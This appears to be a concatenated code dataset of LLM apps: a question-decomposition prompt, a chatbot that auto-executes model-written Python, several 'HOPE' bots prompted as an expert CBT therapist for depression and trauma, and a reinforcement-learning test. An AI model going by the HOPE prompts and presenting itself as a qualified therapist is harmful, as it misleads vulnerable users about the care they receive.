'score_defs': {'perplexity': 'prl', 'top-tokens-10': 'top10'}
})
if not os.path.isdir(os.path.join(test_collection_dir, 'results')):
os.mkdir(os.path.join(test_collection_dir, 'results'))
exp.save_as_json(json_path)
return exp
| [] |
2024-01-10 | jayralencar/visconde | iirc_query_decomposition.py | import openai
import os
from transformers import GPT2Tokenizer
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
openai.api_key = os.getenv("OPENAI_API_KEY")
def generate(prompt,max_tokens=1000, temperature=0):
tokens = tokenizer.tokenize(prompt)
response = openai.Completion.create(
engine="text-davinci-002",
prompt=prompt,
temperature=temperature,
max_tokens=max_tokens,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
return response["choices"][0]['text']
def decompose(question):
prompt="Decompose a question in self-contained sub-questions. Use \"The question needs no decomposition\" when no decomposition is needed.\n\nExample 1:\n\nQuestion: Is Hamlet more common on IMDB than Comedy of Errors?\n\nDecompositions: \n1: How many listings of Hamlet are there on IMDB?\n2: How many listing of Comedy of Errors is there on IMDB?\n\nExample 2:\n\nQuestion: Are birds important to badminton?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 3:\n\nQuestion: Is it legal for a licensed child driving Mercedes-Benz to be employed in US?\n\nDecompositions:\n1: What is the minimum driving age in the US?\n2: What is the minimum age for someone to be employed in the US?\n\nExample 4:\n\nQuestion: Are all cucumbers the same texture?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 5:\n\nQuestion: Hydrogen's atomic number squared exceeds number of Spice Girls?\n\nDecompositions:\n1: What is the atomic number of hydrogen?\n2: How many Spice Girls are there?\n\nExample 6:\n\nQuestion: {0}\n\nDecompositions:"
res = generate(prompt.format(question), max_tokens=256)
# print(res)
if res.lower().strip() == "the question needs no decomposition.":
return [question]
try:
questions = [l for l in res.splitlines() if l != ""]
questions = [q.split(':')[1].strip() for q in questions]
return questions
except:
return [question]
| [
"Decompose a question in self-contained sub-questions. Use \"The question needs no decomposition\" when no decomposition is needed.\n\nExample 1:\n\nQuestion: Is Hamlet more common on IMDB than Comedy of Errors?\n\nDecompositions: \n1: How many listings of Hamlet are there on IMDB?\n2: How many listing of Comedy of Errors is there on IMDB?\n\nExample 2:\n\nQuestion: Are birds important to badminton?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 3:\n\nQuestion: Is it legal for a licensed child driving Mercedes-Benz to be employed in US?\n\nDecompositions:\n1: What is the minimum driving age in the US?\n2: What is the minimum age for someone to be employed in the US?\n\nExample 4:\n\nQuestion: Are all cucumbers the same texture?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 5:\n\nQuestion: Hydrogen's atomic number squared exceeds number of Spice Girls?\n\nDecompositions:\n1: What is the atomic number of hydrogen?\n2: How many Spice Girls are there?\n\nExample 6:\n\nQuestion: {0}\n\nDecompositions:"
] |
2024-01-10 | ChrisDeadman/codebot | codebot~codebot.py | from collections import deque
import openai
import requests
from utils import num_tokens_from_messages
from utils.cyclic_buffer import CyclicBuffer
# define color codes
COLOR_GREEN = "\033[32m"
COLOR_ORANGE = "\033[33m"
COLOR_GRAY = "\033[90m"
COLOR_RESET = "\033[0m"
class Message:
def __init__(self, role, content):
self.role = role
self.content = content
def to_dict(self):
return {"role": self.role, "content": self.content}
class Codebot:
def __init__(
self,
initial_prompt: str,
api_key: str,
buffer_capacity=15,
max_tokens: int = 4000,
):
self.messages = CyclicBuffer[Message](buffer_capacity)
self.initial_prompt = Message("system", initial_prompt)
self.max_tokens = max_tokens
openai.api_key = api_key
def chat_with_gpt(self) -> str:
messages = deque([m.to_dict() for m in self.messages])
while True:
message_dicts = [self.initial_prompt.to_dict()] + list(messages)
num_tokens = num_tokens_from_messages(message_dicts)
if num_tokens < self.max_tokens:
break
if messages:
# remove oldest message and try again
messages.popleft()
else:
# no more messages
self.messages.pop()
return (
f"Too many tokens ({num_tokens}>{self.max_tokens}), "
f"please limit your message size!"
)
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo", messages=message_dicts
)
return response.choices[0].message.content
def parse_response(self, input_str: str):
result = []
in_code_block = False
ignore_code_block = False
for line in input_str.split("\n"):
if line.startswith("```"):
in_code_block = not in_code_block
if in_code_block:
if line.replace(" ", "").startswith("```python") or (
line.strip() == "```"
and not ("```python" in input_str or "``` python" in input_str)
):
ignore_code_block = False
else:
ignore_code_block = True
if ignore_code_block:
result.append({"code": False, "content": line})
if not in_code_block:
ignore_code_block = False
else:
is_code = in_code_block and not ignore_code_block
result.append({"code": is_code, "content": line})
return result
def execute_code(self, code: str):
try:
response = requests.post(
"http://localhost:8080/execute", data=code.encode("utf-8")
)
result = response.content.decode("utf-8")
except Exception as e:
result = str(e)
return result
def run(self):
user_input = input("You: ")
user_cmd = user_input.strip().lower()
if user_cmd == "reset" or user_cmd == "clear":
self.messages.clear()
return True
elif user_cmd == "exit":
return False
if user_input.strip():
self.messages.push(Message("user", user_input))
gpt_response = self.chat_with_gpt()
if gpt_response.strip():
self.messages.push(Message("assistant", gpt_response))
gpt_response_parsed = self.parse_response(gpt_response)
gpt_code = "\n".join(
map(
lambda r: r["content"],
filter(lambda r: r["code"], gpt_response_parsed),
)
)
for r in gpt_response_parsed:
if r["code"]:
print(f"{COLOR_GREEN}{r['content']}{COLOR_RESET}")
else:
print(f"{COLOR_GRAY}{r['content']}{COLOR_RESET}")
if gpt_code.strip():
result = self.execute_code(gpt_code)
print(f"{COLOR_ORANGE}Output: {result}{COLOR_RESET}")
self.messages.push(Message("system", f"Output: {result}"))
return True
if __name__ == "__main__":
with open("data/initial_prompt.txt", "r") as f:
initial_prompt = f.read()
with open("data/openai_api_key.txt", "r") as f:
api_key = f.read()
codebot = Codebot(initial_prompt, api_key)
while codebot.run():
pass # Run until complete
| [
"[self.initial_prompt.to_dict()] + list(messages)",
"assistant",
"user",
"Output: PLACEHOLDER",
"system"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~Testing~reply.py | # take user input from text file, append it to session chat, put reply in output.txt
# import sys
# sys.stdin = open("file_rw\\input.txt","r")
# sys.stdout = open("file_rw\\input.txt","w")
import openai
import sys
inp = sys.argv[1:]
inp_str = ""
import os
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.getenv("OPENAI_API_KEY")
for i in inp:
inp_str += i + " "
prompt = "#Client: " + inp_str + "\n#HOPE:"
print(prompt)
response = openai.Completion.create(
engine = "text-davinci-003",
max_tokens = 512,
prompt = prompt,
temperature = 0, # Risk taking ability - 0
top_p = 1.0, # Influncing sampling - 1.0
frequency_penalty = 0.0, # Penalties for repeated tokens - 0.0
presence_penalty = 0.0, # Penalties for new words - 0.0
stop = ["#"] # when to stop generating
)
print(response.choices[0].text)
#stop at "#"
# append | [
"#Client: PLACEHOLDER\n#HOPE:"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~main_01.py | import streamlit as st
from langchain import PromptTemplate,LLMChain
from langchain.memory import ConversationBufferWindowMemory
#from langchain.chains import ConversationChain
from langchain.chains.conversation.memory import ConversationEntityMemory
from langchain.chains.conversation.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
from langchain.llms import OpenAI
st.set_page_config(page_title='HOPE', layout='wide')
st.title("HOPE")
import os
from dotenv import load_dotenv
load_dotenv()
OPENAI_API_KEY = os.getenv("OPENAI_API_KEY")
#MODEL = 'text-davinci-003' # options=['gpt-3.5-turbo','text-davinci-003','text-davinci-002'])
K = 5
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
if "generated" not in st.session_state:
st.session_state["generated"] = []
if "past" not in st.session_state:
st.session_state["past"] = []
if "input" not in st.session_state:
st.session_state["input"] = ""
if "stored_session" not in st.session_state:
st.session_state["stored_session"] = []
def get_text():
input_text = st.text_input("You: ", st.session_state["input"], key="input",
placeholder="I am your HOPE! Ask me anything ...",
label_visibility='hidden')
return input_text
def new_chat():
"""
Clears session state and starts a new chat.
"""
save = []
for i in range(len(st.session_state['generated'])-1, -1, -1):
save.append("User:" + st.session_state["past"][i])
save.append("Bot:" + st.session_state["generated"][i])
st.session_state["stored_session"].append(save)
st.session_state["generated"] = []
st.session_state["past"] = []
st.session_state["input"] = ""
st.session_state.entity_memory.store = {}
st.session_state.entity_memory.buffer.clear()
# st.write(st.session_state.entity_memory.store)
# st.write(st.session_state.entity_memory.buffer)
# Create a ConversationEntityMemory object if not already created
if 'entity_memory' not in st.session_state:
st.session_state.entity_memory = ConversationEntityMemory(llm=OpenAI(temperature=0), k=K )
# Create the ConversationChain object with the specified configuration
bot_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K),
)
st.sidebar.button("New Chat", on_click = new_chat, type='primary')
user_input = get_text()
if user_input:
output = bot_chain.predict(human_input = user_input)
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
print(st.session_state["generated"])
# Display the conversation history using an expander, and allow the user to download it
with st.expander("Conversation", expanded=True):
for i in range(len(st.session_state['generated'])-1, -1, -1):
st.success("Hope: "+st.session_state["generated"][i]) # icon="🤖"
st.info("User: "+st.session_state["past"][i])
# Display stored conversation sessions in the sidebar
for i, sublist in enumerate(st.session_state.stored_session):
with st.sidebar.expander(label= f"Conversation-Session:{i}"):
st.write(sublist)
# Allow the user to clear all stored conversation sessions
if st.session_state.stored_session:
if st.sidebar.checkbox("Clear-all"):
del st.session_state.stored_session
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~memory_bot.py | from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import os
from dotenv import load_dotenv
load_dotenv()
os.environ["OPENAI_API_KEY"] = os.getenv("OPENAI_API_KEY")
K = 10 # Number of previous convo
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
# Hope may also suggest breathing exercises for anxiety and other conventional methods or simple tasks that may help the user.
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
chatgpt_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K)
)
flag = 1
while(flag == 1):
inp = str(input("User:"))
if(inp == "exit"):
print("Bye :)")
flag = 0
continue
else:
output = chatgpt_chain.predict(human_input = inp)
print("Hope:",output)
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~memory_bot_cli.py | from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import sys
import os
from dotenv import load_dotenv
load_dotenv()
os.environ["OPENAI_API_KEY"] = os.getenv("OPENAI_API_KEY")
K = 10 # Number of previous convo
template = """Hope is an expert in performing Cognitive Behavioural Therapy.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
inp = sys.argv[1:]
inp_str = ""
for i in inp:
inp_str += i + " "
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
chatgpt_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K),
)
flag = 1
change = 0
inp_prev = ""
inp = "hi"
while(flag == 1):
while(change == 0):
with open("file_rw\\input.txt", "r") as file:
inp = file.read().strip()
if(inp != ""):
if(inp.endswith("###")):
if(inp != inp_prev):
change = 1
inp_prev = inp
inp = inp.replace("###","")
if(inp == "exit"):
print("Bye :)")
flag = 0
continue
else:
output = chatgpt_chain.predict(human_input = inp)
print("Hope:",output)
with open("file_rw\output.txt", 'w') as f:
f.write(output+"###")
change = 0
| [
"Hope is an expert in performing Cognitive Behavioural Therapy.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~hope_host.py | import streamlit as st
from streamlit_chat import message
from langchain.chains import ConversationChain
from langchain.chains.conversation.memory import ConversationEntityMemory
from langchain.chains.conversation.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
from langchain.llms import OpenAI
from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import os
os.environ["OPENAI_API_KEY"] = st.secrets["OPENAI_API_KEY"]
template = st.secrets["template"]
MODEL = 'text-davinci-003'
K = 10
st.set_page_config(page_title='HOPE', layout='wide')
st.title("HOPE")
if "generated" not in st.session_state:
st.session_state["generated"] = []
if "past" not in st.session_state:
st.session_state["past"] = []
if "input" not in st.session_state:
st.session_state["input"] = ""
if "stored_session" not in st.session_state:
st.session_state["stored_session"] = []
def get_text():
input_text = st.text_input("You: ", st.session_state["input"], key="input",
placeholder="I am your HOPE! Ask me anything ...",
label_visibility='hidden')
return input_text
def new_chat():
save = []
for i in range(len(st.session_state['generated'])-1, -1, -1):
save.append("User:" + st.session_state["past"][i])
save.append("Bot:" + st.session_state["generated"][i])
st.session_state["stored_session"].append(save)
st.session_state["generated"] = []
st.session_state["past"] = []
st.session_state["input"] = ""
llm = OpenAI(temperature=0)
if 'entity_memory' not in st.session_state:
st.session_state.entity_memory = ConversationBufferWindowMemory(k=K)
if 'entity_memory' not in st.session_state:
st.session_state.entity_memory = ConversationBufferWindowMemory(k=K)
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
bot_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=st.session_state.entity_memory
)
st.sidebar.button("New Chat", on_click = new_chat, type='primary')
user_input = get_text()
if user_input:
output = bot_chain.predict(human_input = user_input)
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
with st.expander("Conversation", expanded=True):
for i in range(len(st.session_state['generated'])-1, -1, -1):
message(st.session_state["generated"][i], key=str(i))
message(st.session_state['past'][i], is_user=True, key=str(i) + '_user')
for i, sublist in enumerate(st.session_state.stored_session):
with st.sidebar.expander(label= f"Conversation-Session:{i}"):
st.write(sublist)
if st.session_state.stored_session:
if st.sidebar.checkbox("Clear-all"):
del st.session_state.stored_session
| [
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~Testing~start_convo.py | # pass all details stored in the jason file in a structured prompt
import openai
import os
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.getenv("OPENAI_API_KEY")
import json
prompt = "You are HOPE who is an expert in performing Cognitive Behavioural therapy.The major problems faced by your client are "
with open("file_rw\\userid.json","r") as jsonFile:
jsonObj = json.load(jsonFile)
jsonFile.close()
problems = jsonObj['problems']
summary = jsonObj['summary']
#print(problems,"\n",summary)
for i in range(len(problems)-1):
prompt = prompt + problems[i] + ","
prompt = prompt + problems[-1] + "."
#print(prompt)
prompt = prompt + "Following is the summary of what the client has conversed with you \n#Start of summary:\n" + summary + "\n#End of Summary\n"
prompt = prompt + "The following is a conversation between Client and HOPE:"
print(prompt)
response = openai.Completion.create(
engine = "text-davinci-003",
max_tokens = 512,
prompt = prompt,
temperature = 0.5, # Risk taking ability
top_p = 1.0, # Influncing sampling
frequency_penalty = 0.0, # Penalties for repeated tokens
presence_penalty = 0.0, # Penalties for new words
stop = ["#"] # when to stop generating
)
#print(response.choices[0].text) | [
"You are HOPE who is an expert in performing Cognitive Behavioural therapy.The major problems faced by your client are ",
"PLACEHOLDERFollowing is the summary of what the client has conversed with you \n#Start of summary:\nPLACEHOLDER\n#End of Summary\n",
"PLACEHOLDERThe following is a conversation between Client and HOPE:",
"PLACEHOLDERPLACEHOLDER."
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | hope~application~models~memory_bot.py | #!/usr/local/bin/python3
import cgi,cgitb
print ("")
import sys
import os
from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import os
from dotenv import load_dotenv
load_dotenv()
os.environ["OPENAI_API_KEY"] = os.getenv("OPENAI_API_KEY")
K = 10 # Number of previous convo
print('hello')
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
# Hope may also suggest breathing exercises for anxiety and other conventional methods or simple tasks that may help the user.
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
chatgpt_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K),
)
flag = 1
change = 0
inp_prev = ""
inp = "hi"
while(flag == 1):
while(change == 0):
with open("application/models/input.txt", "r") as file:
inp = file.read().strip()
if(inp != ""):
if(inp.endswith("###")):
if(inp != inp_prev):
change = 1
inp_prev = inp
inp = inp.replace("###","")
if(inp == "exit"):
print("Bye :)")
with open("application/models/output.txt", 'w') as f:
f.write("session ended###")
flag = 0
else:
output = chatgpt_chain.predict(human_input = inp)
print("Hope:",output)
with open("application/models/output.txt", 'w') as f:
f.write(output+"###")
change = 0
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~Testing~stateful_bot.py | import streamlit as st
from langchain.chains import ConversationChain
from langchain.chains.conversation.memory import ConversationEntityMemory
from langchain.chains.conversation.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
from langchain.llms import OpenAI
import openai
import os
from dotenv import load_dotenv
load_dotenv()
openai_api_key = os.getenv("OPENAI_API_KEY")
openai.api_key = os.getenv("OPENAI_API_KEY")
MODEL = "gpt-3.5-turbo"
K = 10
if "generated" not in st.session_state:
st.session_state["generated"] = []
if "past" not in st.session_state:
st.session_state["past"] = []
if "input" not in st.session_state:
st.session_state["input"] = ""
if "stored_session" not in st.session_state:
st.session_state["stored_session"] = []
user_input = str(input("User:"))
# Create an OpenAI instance
llm = OpenAI(temperature=0,
openai_api_key = openai_api_key,
model_name=MODEL,
verbose=False)
# Create a ConversationEntityMemory object if not already created
if 'entity_memory' not in st.session_state:
st.session_state.entity_memory = ConversationEntityMemory(llm=llm, k=K ) # K is number of outputs to consider
# Create the ConversationChain object with the specified configuration
Conversation = ConversationChain(
llm=llm,
prompt=ENTITY_MEMORY_CONVERSATION_TEMPLATE,
memory=st.session_state.entity_memory
)
output = Conversation.run(input=user_input)
print(output)
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
def new_chat(): # Clears session state and starts a new chat.
save = []
for i in range(len(st.session_state['generated'])-1, -1, -1):
save.append("User:" + st.session_state["past"][i])
save.append("Bot:" + st.session_state["generated"][i])
st.session_state["stored_session"].append(save)
st.session_state["generated"] = []
st.session_state["past"] = []
st.session_state["input"] = ""
st.session_state.entity_memory.store = {}
st.session_state.entity_memory.buffer.clear()
| [] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~main_02.py | import openai
# from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
# from langchain.memory import ConversationBufferWindowMemory
import streamlit as st
from streamlit_chat import message
import os
from dotenv import load_dotenv
load_dotenv()
OPENAI_API_KEY = os.getenv("OPENAI_API_KEY")
openai.api_key = OPENAI_API_KEY
K = 10 # Number of previous convo
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{chat_history}
User: {human_input}
Hope:"""
def generate_response(inp,temp):
# prompt = PromptTemplate(
# input_variables=["history", "human_input"],
# template=template
# )
history = ""
for i in range(len(st.session_state.generated)):
history = history+"User: "+st.session_state.past[i]+"\n"
history = history+"Hope: "+st.session_state.generated[i]+"\n"
prompt = temp.format(chat_history = history,human_input = inp)
print(prompt)
response = openai.Completion.predict(
engine="text-davinci-003",
prompt=prompt,
temperature=0,
)
message = response.choices[0].text
return message
#Creating the chatbot interface
st.title("H O P E")
# Storing the chat
if 'generated' not in st.session_state:
st.session_state['generated'] = []
if 'past' not in st.session_state:
st.session_state['past'] = []
# We will get the user's input by calling the get_text function
def get_text():
input_text = st.text_input("You: ","", key="input")
return input_text
user_input = get_text()
if user_input:
output = generate_response(user_input,template)
# store the output
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
print(st.session_state.generated)
print(st.session_state.past)
if st.session_state['generated']:
for i in range(len(st.session_state['generated'])-1, -1, -1):
message(st.session_state["generated"][i], key=str(i))
message(st.session_state['past'][i], is_user=True, key=str(i) + '_user')
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{chat_history}\nUser: {human_input}\nHope:"
] |
2024-01-10 | AshishSinha5/rag_api | src~rag_app~load_data.py | from langchain.document_loaders import PyPDFLoader
from langchain.document_loaders.html import UnstructuredHTMLLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
def initialize_splitter(chunk_size, chunk_overlap):
text_splitter = RecursiveCharacterTextSplitter(
# Set a really small chunk size, just to show.
chunk_size = chunk_size,
chunk_overlap = chunk_overlap,
length_function = len,
is_separator_regex = False,
)
return text_splitter
def load_split_html_file(html_file, text_splitter):
loader = UnstructuredHTMLLoader(html_file)
data = loader.load_and_split(text_splitter)
return data
def load_split_pdf_file(pdf_file, text_splitter):
loaded = PyPDFLoader(pdf_file)
data = loaded.load_and_split(text_splitter)
return data
| [] |
2024-01-10 | AshishSinha5/rag_api | src~rag_app~load_llm.py | import os
os.environ["TOKENIZERS_PARALLELISM"] = "true"
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"]="python"
from langchain.llms import LlamaCpp
def load_lamma_cpp(model_args):
llm = LlamaCpp(**model_args)
return llm | [] |
2024-01-10 | harperreed/houseagent | houseagent~house_bot.py | import logging
import structlog
import json
import os
import re
from langchain.chat_models import ChatOpenAI
from langchain import PromptTemplate, LLMChain
from langchain.prompts import (
ChatPromptTemplate,
PromptTemplate,
SystemMessagePromptTemplate,
AIMessagePromptTemplate,
HumanMessagePromptTemplate,
)
from langchain.schema import (
AIMessage,
HumanMessage,
SystemMessage
)
class HouseBot:
def __init__(self):
self.logger = structlog.getLogger(__name__)
prompt_dir = 'prompts'
human_primpt_filename = 'housebot_human.txt'
system_prompt_filename = 'housebot_system.txt'
default_state_filename = 'default_state.json'
with open(f'{prompt_dir}/{system_prompt_filename}', 'r') as f:
system_prompt_template = f.read()
with open(f'{prompt_dir}/{human_primpt_filename}', 'r') as f:
human_prompt_template = f.read()
with open(f'{prompt_dir}/{default_state_filename}', 'r') as f:
self.default_state = f.read()
self.system_message_prompt = SystemMessagePromptTemplate.from_template(system_prompt_template)
self.human_message_prompt = HumanMessagePromptTemplate.from_template(human_prompt_template)
openai_model = os.getenv("OPENAI_MODEL", "gpt-3.5-turbo")
openai_temperature = os.getenv("OPENAI_TEMPERATURE", "0")
self.chat = ChatOpenAI(model_name=openai_model, temperature=openai_temperature)
def strip_emojis(self, text):
RE_EMOJI = re.compile('[\U00010000-\U0010ffff]', flags=re.UNICODE)
return RE_EMOJI.sub(r'', text)
def generate_response(self, current_state, last_state):
self.logger.debug("let's make a request")
chat_prompt = ChatPromptTemplate.from_messages([self.system_message_prompt, self.human_message_prompt])
# get a chat completion from the formatted messages
chain = LLMChain(llm=self.chat, prompt=chat_prompt)
result = chain.run(default_state=json.dumps(self.default_state, separators=(',', ':')), current_state=current_state, last_state=last_state)
self.logger.debug(f"let's make a request: {result}")
# print(result.llm_output)
#strip emoji
result = self.strip_emojis(result)
return result
| [
"prompts",
"housebot_system.txt"
] |
2024-01-10 | gruns/deepchem | deepchem~rl~tests~test_ppo.py | from flaky import flaky
import deepchem as dc
from deepchem.models.optimizers import Adam, PolynomialDecay
from tensorflow.keras.layers import Input, Dense, GRU, Reshape, Softmax
import numpy as np
import tensorflow as tf
import unittest
from nose.plugins.attrib import attr
class TestPPO(unittest.TestCase):
@flaky
def test_roulette(self):
"""Test training a policy for the roulette environment."""
# This is modeled after the Roulette-v0 environment from OpenAI Gym.
# The player can bet on any number from 0 to 36, or walk away (which ends the
# game). The average reward for any bet is slightly negative, so the best
# strategy is to walk away.
class RouletteEnvironment(dc.rl.Environment):
def __init__(self):
super(RouletteEnvironment, self).__init__([(1,)], 38)
self._state = [np.array([0])]
def step(self, action):
if action == 37:
self._terminated = True # Walk away.
return 0.0
wheel = np.random.randint(37)
if wheel == 0:
if action == 0:
return 35.0
return -1.0
if action != 0 and wheel % 2 == action % 2:
return 1.0
return -1.0
def reset(self):
self._terminated = False
env = RouletteEnvironment()
# This policy just learns a constant probability for each action, and a constant for the value.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value'])
def create_model(self, **kwargs):
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(**kwargs)
self.action = tf.Variable(np.ones(env.n_actions, np.float32))
self.value = tf.Variable([0.0], tf.float32)
def call(self, inputs, **kwargs):
prob = tf.nn.softmax(tf.reshape(self.action, (-1, env.n_actions)))
return (prob, self.value)
return TestModel()
# Optimize it.
ppo = dc.rl.PPO(
env,
TestPolicy(),
max_rollout_length=20,
optimizer=Adam(learning_rate=0.003))
ppo.fit(80000)
# It should have learned that the expected value is very close to zero, and that the best
# action is to walk away.
action_prob, value = ppo.predict([[0]])
assert -0.8 < value[0] < 0.5
assert action_prob.argmax() == 37
assert ppo.select_action([[0]], deterministic=True) == 37
# Verify that we can create a new PPO object, reload the parameters from the first one, and
# get the same result.
new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
new_ppo.restore()
action_prob2, value2 = new_ppo.predict([[0]])
assert value2 == value
# Do the same thing, only using the "restore" argument to fit().
new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
new_ppo.fit(0, restore=True)
action_prob2, value2 = new_ppo.predict([[0]])
assert value2 == value
def test_recurrent_states(self):
"""Test a policy that involves recurrent layers."""
# The environment just has a constant state.
class TestEnvironment(dc.rl.Environment):
def __init__(self):
super(TestEnvironment, self).__init__((10,), 10)
self._state = np.random.random(10)
